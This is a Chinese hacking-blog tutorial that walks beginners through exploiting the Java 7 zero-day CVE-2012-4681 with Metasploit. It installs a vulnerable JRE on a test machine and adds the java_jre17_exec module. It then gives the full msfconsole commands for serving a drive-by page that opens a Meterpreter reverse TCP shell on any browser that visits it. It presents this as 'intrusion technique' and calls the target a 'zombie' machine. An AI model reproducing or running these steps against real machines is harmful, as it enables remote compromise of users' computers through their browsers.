作者:Secer

博客:http://Ha.cker.in

Q Q:278641414

新手教程,仅为交流和进步,大牛勿喷。

最近java爆0day了,很多新手童鞋不知道怎么利用,下面把我自己的研究成果抛砖引玉给大家,见笑了。

0x01 肉鸡环境安装

Java的0day,首先当然要在XP测试机里面安装Jre环境,Jre下载地址在这http://jdk7.java.net/download.html或者http://www.xdowns.com/soft/6/56/2011/Soft_75169.html

我下的是Java Runtime Environment (JRE) 7.0 Update 6 windows-i586.exe如图1:

clip_image001

图1

安装直接下一步即可,如图2:

clip_image002

图2

安装完成后运行java –version命令看是否可以显示版本,如果显示了即表示安装成功!同时下图看到XP测试机IP为192.168.1.107,如图3:

clip_image004

图3

同时运行Backtrack 5 虚拟机,Backtrack的IP为192.168.1.106,和测试机在同一局域网,运行Metasploit如图4:

clip_image006

图4

0x02 给Metasploit添加模块

我的bt5里的Metasploit没有更新,默认当然是没有Java 0day利用模块的,图5中可以看到684个Exploits:

clip_image008

图5

下面我们来给Metasploit添加利用java漏洞必要的模块,可以到这里下载查看相关模块,如图6:

clip_image009

图6

下载Exploit.class、Exploit.java、java_jre17_exec.rb三个文件分别放到/opt/framework3/msf3目录下如图6所示对应的目录中,添加好了之后运行reload_all重新加载各模块,看到Metasploit里多了一个Exploit现在是685如图8:

clip_image011

图7

clip_image013

图8

0x03 开始exploit吧

为了照顾新玩家,所以准备工作做的很足啊,终于到了exploit的时刻了!

msf > use exploit/multi/browser/java_jre17_exec

msf > set PAYLOAD windows/meterpreter/reverse_tcp

#payload为反弹tcp shell

msf exploit(java_jre17_exec) > show options

#查看当前选项,可以看到下面我们要设置的参数,如图9:

clip_image015

图9

msf exploit(java_jre17_exec) > set srvhost 192.168.1.106

srvhost => 192.168.1.106

msf exploit(java_jre17_exec) > set srvport 80

srvport => 80

msf exploit(java_jre17_exec) > set lport 8888

lport => 8888

msf exploit(java_jre17_exec) > set uripath java_0day

uripath => java

#设置web服务器IP,即BT本机IP和端口,uri路径为java_0day

msf exploit(java_jre17_exec) > show options

clip_image017

图A

选项已设置好,执行Exploit命令,如图B:

clip_image018

图B

现在我们在XP测试机上访问这个网址URL: http://192.168.1.106:80/java0day,如图C:

clip_image020

图C

发现是个空白页,源码已截图。

打开网页后发现Metasploit的shell里显示如图D:

clip_image022

图D

嗯……正在后台执行漏洞利用代码,如图E,已经获取当前用户权限:

clip_image024

图E

截个屏看看,咿……怎么变Windows Server了,因为凌晨滴时候XP测试机大姨妈来了 我就03上了。。

clip_image026

图F

本机XP SP3+IE8测试如图

clip_image028

图G

今天的分享就到这了,以后会在博客发更多自己写的入侵技术类文章和各位安全爱好者、大黑阔交流的,哈哈哈哈。

参考资料:

http://dev.metasploit.com/redmine/projects/framework/repository/revisions/52ca1083c22de7022baf7dca8a1756909f803341

https://community.rapid7.com/community/metasploit/blog/2012/08/27/lets-start-the-week-with-a-new-java-0day

http://www.freebuf.com/vuls/5485.html

 

附一:

测试未成功,本机版本不对,chrome

clip_image030

附二:

Youtue上的视频CVE-2012-4681 Java 7 Applet RCE 0day Gondvv Windows Metasploit Demo

源链接

Hacking more

...